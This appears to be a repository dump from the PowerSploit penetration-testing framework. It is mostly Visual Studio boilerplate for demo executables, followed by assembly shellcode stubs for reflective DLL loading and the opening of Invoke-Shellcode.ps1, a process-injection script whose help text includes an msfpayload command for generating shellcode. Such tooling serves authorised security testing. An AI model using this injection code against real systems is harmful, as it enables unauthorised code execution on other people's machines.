Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\" />\n    <ClInclude Include=\"targetver.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"DemoExe_MDd.cpp\" />\n    <ClCompile Include=\"stdafx.cpp\">\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">Create</PrecompiledHeader>\n    </ClCompile>\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"targetver.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"stdafx.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"DemoExe_MDd.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt",
    "content": "========================================================================\n    CONSOLE APPLICATION : DemoExe_MDd Project Overview\n========================================================================\n\nAppWizard has created this DemoExe_MDd application for you.\n\nThis file contains a summary of what you will find in each of the files that\nmake up your DemoExe_MDd application.\n\n\nDemoExe_MDd.vcxproj\n    This is the main project file for VC++ projects generated using an Application Wizard.\n    It contains information about the version of Visual C++ that generated the file, and\n    information about the platforms, configurations, and project features selected with the\n    Application Wizard.\n\nDemoExe_MDd.vcxproj.filters\n    This is the filters file for VC++ projects generated using an Application Wizard. \n    It contains information about the association between the files in your project \n    and the filters. This association is used in the IDE to show grouping of files with\n    similar extensions under a specific node (for e.g. \".cpp\" files are associated with the\n    \"Source Files\" filter).\n\nDemoExe_MDd.cpp\n    This is the main application source file.\n\n/////////////////////////////////////////////////////////////////////////////\nOther standard files:\n\nStdAfx.h, StdAfx.cpp\n    These files are used to build a precompiled header (PCH) file\n    named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj.\n\n/////////////////////////////////////////////////////////////////////////////\nOther notes:\n\nAppWizard uses \"TODO:\" comments to indicate parts of the source code you\nshould add to or customize.\n\n/////////////////////////////////////////////////////////////////////////////\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp",
    "content": "// stdafx.cpp : source file that includes just the standard includes\n// DemoExe_MDd.pch will be the pre-compiled header\n// stdafx.obj will contain the pre-compiled type information\n\n#include \"stdafx.h\"\n\n// TODO: reference any additional headers you need in STDAFX.H\n// and not in this file\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h",
    "content": "// stdafx.h : include file for standard system include files,\n// or project specific include files that are used frequently, but\n// are changed infrequently\n//\n\n#pragma once\n\n#include \"targetver.h\"\n\n#include <stdio.h>\n#include <tchar.h>\n\n\n\n// TODO: reference additional headers your program requires here\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h",
    "content": "#pragma once\n\n// Including SDKDDKVer.h defines the highest available Windows platform.\n\n// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and\n// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.\n\n#include <SDKDDKVer.h>\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp",
    "content": "// ExeToInjectInTo.cpp : Defines the entry point for the console application.\n//\n\n#include \"stdafx.h\"\n#include <stdio.h>\n\nusing namespace std;\n\nint _tmain(int argc, _TCHAR* argv[])\n{\n\tprintf(\"Press enter to close.\\n\");\n\tgetchar();\n\t\n\treturn 0;\n}\n\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>ExeToInjectInTo</RootNamespace>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v110</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <WarningLevel>Level3</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\" />\n    <ClInclude Include=\"targetver.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"ExeToInjectInTo.cpp\" />\n    <ClCompile Include=\"stdafx.cpp\">\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">Create</PrecompiledHeader>\n    </ClCompile>\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <Text Include=\"ReadMe.txt\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"stdafx.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"targetver.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"stdafx.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"ExeToInjectInTo.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt",
    "content": "========================================================================\n    CONSOLE APPLICATION : ExeToInjectInTo Project Overview\n========================================================================\n\nAppWizard has created this ExeToInjectInTo application for you.\n\nThis file contains a summary of what you will find in each of the files that\nmake up your ExeToInjectInTo application.\n\n\nExeToInjectInTo.vcxproj\n    This is the main project file for VC++ projects generated using an Application Wizard.\n    It contains information about the version of Visual C++ that generated the file, and\n    information about the platforms, configurations, and project features selected with the\n    Application Wizard.\n\nExeToInjectInTo.vcxproj.filters\n    This is the filters file for VC++ projects generated using an Application Wizard. \n    It contains information about the association between the files in your project \n    and the filters. This association is used in the IDE to show grouping of files with\n    similar extensions under a specific node (for e.g. \".cpp\" files are associated with the\n    \"Source Files\" filter).\n\nExeToInjectInTo.cpp\n    This is the main application source file.\n\n/////////////////////////////////////////////////////////////////////////////\nOther standard files:\n\nStdAfx.h, StdAfx.cpp\n    These files are used to build a precompiled header (PCH) file\n    named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj.\n\n/////////////////////////////////////////////////////////////////////////////\nOther notes:\n\nAppWizard uses \"TODO:\" comments to indicate parts of the source code you\nshould add to or customize.\n\n/////////////////////////////////////////////////////////////////////////////\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp",
    "content": "// stdafx.cpp : source file that includes just the standard includes\n// ExeToInjectInTo.pch will be the pre-compiled header\n// stdafx.obj will contain the pre-compiled type information\n\n#include \"stdafx.h\"\n\n// TODO: reference any additional headers you need in STDAFX.H\n// and not in this file\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h",
    "content": "// stdafx.h : include file for standard system include files,\n// or project specific include files that are used frequently, but\n// are changed infrequently\n//\n\n#pragma once\n\n#include \"targetver.h\"\n\n#include <stdio.h>\n#include <tchar.h>\n\n\n\n// TODO: reference additional headers your program requires here\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h",
    "content": "#pragma once\n\n// Including SDKDDKVer.h defines the highest available Windows platform.\n\n// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and\n// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.\n\n#include <SDKDDKVer.h>\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio 2012\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"ExeToInjectInTo\", \"ExeToInjectInTo\\ExeToInjectInTo.vcxproj\", \"{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|Win32 = Debug|Win32\n\t\tRelease|Win32 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32\n\t\t{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt",
    "content": "This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included beause I didn't save it, this should just be for the SUPER easy stuff like moving an address to EAX and returning.\n\nCompile:\nx64:\nnasm -f elf64 FileName.asm\nld -o FileName FileName.o\nobjdump -M intel -d FileName\n\nx86:\nnasm FileName.asm\nld -o FileName FileName.o\nobjdump -M intel -d FileName"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm",
    "content": "[SECTION .text]\nglobal _start\n\n_start:\n\t; Get stack setup\n\tpush rbx\n\tmov rbx, rsp\n\tand sp, 0xff00\n\t\n\t; Call DllMain\n\tmov rcx, 0x4141414141414141\t; DLLHandle, set by PowerShell\n\tmov rdx, 0x1\t\t\t; PROCESS_ATTACH\n\tmov r8, 0x0\t\t\t; NULL\n\tmov rax, 0x4141414141414141\t; Address of DllMain, set by PS\n\tcall rax\n\n\t; Fix stack\n\tmov rsp, rbx\n\tpop rbx\n\tret\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm",
    "content": "[SECTION .text]\n\nglobal _start\n\n_start:\n\t; Set a var to 1, let PS known exe is exiting\n\tmov rbx, 0x4141414141414141\n\tmov [rbx], byte 0x01\n\n\t; Call exitthread instead of exitprocess\n\tsub rsp, 0xc0\n\tand sp, 0xFFf0 ; Needed for stack alignment\n\tmov rbx, 0x4141414141414141\n\tcall rbx\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm",
    "content": "[SECTION .text]\n\nglobal _start\n\n_start:\n\t; Save state of rbx and stack\n\tpush rbx\n\tmov rbx, rsp\n\n\t; Set up stack for function call to GetProcAddress\n\tsub rsp, 0x20\n\tand sp, 0xffc0\n\n\t; Call getprocaddress\n\tmov rcx, 0x4141414141414141\t; DllHandle, set by PS\n\tmov rdx, 0x4141414141414141\t; Ptr to FuncName string, set by PS\n\tmov rax, 0x4141414141414141\t; GetProcAddress address, set by PS\n\tcall rax\n\n\t; Store the result\n\tmov rcx, 0x4141414141414141\t; Ptr to buffer to save result,set by PS\n\tmov [rcx], rax\n\n\t; Restore stack\n\tmov rsp, rbx\n\tpop rbx\n\tret\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm",
    "content": "[SECTION .text]\n\nglobal _start\n\n_start:\n\t; Save rsp and setup stack for function call\n\tpush rbx\n\tmov rbx, rsp\n\tsub rsp, 0x20\n\tand sp, 0xffc0\n\n\t; Call LoadLibraryA\n\tmov rcx, 0x4141414141414141\t; Ptr to string of library, set by PS\n\tmov rdx, 0x4141414141414141\t; Address of LoadLibrary, set by PS\n\tcall rdx\n\n\tmov rdx, 0x4141414141414141\t; Ptr to save result, set by PS\n\tmov [rdx], rax\n\n\t; Fix stack\n\tmov rsp, rbx\n\tpop rbx\n\tret\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm",
    "content": "[SECTION .text]\nglobal _start\n\n_start:\n\t; Get stack setup\n\tpush ebx\n\tmov ebx, esp\n\tand esp, 0xfffffff0\n\t\n\t; Call DllMain\n\tmov ecx, 0x41414141\t\t; DLLHandle, set by PowerShell\n\tmov edx, 0x1\t\t\t; PROCESS_ATTACH\n\tmov eax, 0x0\t\t\t; NULL\n\tpush eax\n\tpush edx\n\tpush ecx\n\tmov eax, 0x41414141\t\t; Address of DllMain, set by PS\n\tcall eax\n\n\t; Fix stack\n\tmov esp, ebx\n\tpop ebx\n\tret\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm",
    "content": "[SECTION .text]\nglobal _start\n\n_start:\n\t; Set a var to 1, let PS know the EXE is exiting\n\tmov ebx, 0x41414141\n\tmov [ebx], byte 0x01\n\n\t; Call exitthread instead of exit process\n\tsub esp, 0x20\n\tand esp, 0xFFFFFFc0 ; Needed for stack alignment\n\tmov ebx, 0x41414141\n\tcall ebx\n"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm",
    "content": "[SECTION .text]\n\nglobal _start\n\n_start:\n\t; Save state of ebx and stack\n\tpush ebx\n\tmov ebx, esp\n\t\n\t; Align stack\n\tand esp, 0xffffffc0\n\n\t; Call GetProcAddress\n\tmov eax, 0x41414141\t; DllHandle, supplied by PS\n\tmov ecx, 0x41414141\t; Function name, supplied by PS\n\tpush ecx\n\tpush eax\n\tmov eax, 0x41414141\t; GetProcAddress address, supplied by PS\n\tcall eax\n\n\t; Write GetProcAddress return value to an address supplied by PS\n\tmov ecx, 0x41414141\t; Address supplied by PS\n\tmov [ecx], eax\n\n\t; Fix stack\n\tmov esp, ebx\n\tpop ebx\n\tret\n"
  },
  {
    "path": "CodeExecution/Invoke-Shellcode.ps1",
    "content": "function Invoke-Shellcode\r\n{\r\n<#\r\n.SYNOPSIS\r\n\r\nInject shellcode into the process ID of your choosing or within the context of the running PowerShell process.\r\n\r\nPowerSploit Function: Invoke-Shellcode  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None  \r\n\r\n.DESCRIPTION\r\n\r\nPortions of this project was based upon syringe.c v1.2 written by Spencer McIntyre\r\n\r\nPowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):\r\n\r\nmsfpayload windows/exec CMD=\"cmd /k calc\" EXITFUNC=thread C | sed '1,6d;s/[\";]//g;s/\\\\/,0/g' | tr -d '\\n' | cut -c2-\r\n\r\nMake sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary.\r\n\r\n.PARAMETER ProcessID\r\n\r\nProcess ID of the process you want to inject shellcode into.\r\n\r\n.PARAMETER Shellcode\r\n\r\nSpecifies an optional shellcode passed in as a byte array\r\n\r\n.PARAMETER Force\r\n\r\nInjects shellcode without prompting for confirmation. By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.\r\n\r\n.EXAMPLE\r\n\r\nInvoke-Shellcode -ProcessId 4274\r\n\r\nDescription\r\n-----------\r\nInject shellcode into process ID 4274.\r\n\r\n.EXAMPLE\r\n\r\nInvoke-Shellcode\r\n\r\nDescription\r\n-----------\r\nInject shellcode into the running instance of PowerShell.\r\n\r\n.EXAMPLE\r\n\r\nInvoke-Shellcode -Shellcode @(0x90,0x90,0xC3)\r\n\r\nDescription\r\n-----------\r\nOverrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)\r\nWarning: This script has no way to validate that your shellcode is 32 vs. 64-bit!\r\n#>\r\n\r\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\r\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]\r\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]\r\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\r\n    [CmdletBinding( DefaultParameterSetName = 'RunLocal', ConfirmImpact = 'High')]\r\n    Param (\r\n        [ValidateNotNullOrEmpty()]\r\n        [UInt16]\r\n        $ProcessID,\r\n\r\n        [Parameter( ParameterSetName = 'RunLocal' )]\r\n        [ValidateNotNullOrEmpty()]\r\n        [Byte[]]\r\n        $Shellcode,\r\n\r\n        [Switch]\r\n        $Force = $False\r\n    )\r\n\r\n    Set-StrictMode -Version 2.0\r\n\r\n    if ( $PSBoundParameters['ProcessID'] )\r\n    {\r\n        # Ensure a valid process ID was provided\r\n        # This could have been validated via 'ValidateScript' but the error generated with Get-Process is more descriptive\r\n        Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null\r\n    }\r\n\r\n    function Local:Get-DelegateType\r\n    {\r\n        Param\r\n        (\r\n            [OutputType([Type])]\r\n\r\n            [Parameter( Position = 0)]\r\n            [Type[]]\r\n            $Parameters = (New-Object Type[](0)),\r\n\r\n            [Parameter( Position = 1 )]\r\n            [Type]\r\n            $ReturnType = [Void]\r\n        )\r\n\r\n        $Domain = [AppDomain]::CurrentDomain\r\n        $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\r\n        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\r\n        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\r\n        $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\r\n        $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\r\n        $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\r\n        $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\r\n        $MethodBuilder.SetImplementationFlags('Runtime, Managed')\r\n\r\n        Write-Output $TypeBuilder.CreateType()\r\n    }\r\n\r\n    function Local:Get-ProcAddress\r\n    {\r\n        Param\r\n        (\r\n            [OutputType([IntPtr])]\r\n\r\n            [Parameter( Position = 0, Mandatory = $True )]\r\n            [String]\r\n            $Module,\r\n\r\n            [Parameter( Position = 1, Mandatory = $True )]\r\n            [String]\r\n            $Procedure\r\n        )\r\n\r\n        # Get a reference to System.dll in the GAC\r\n        $SystemAssembly = 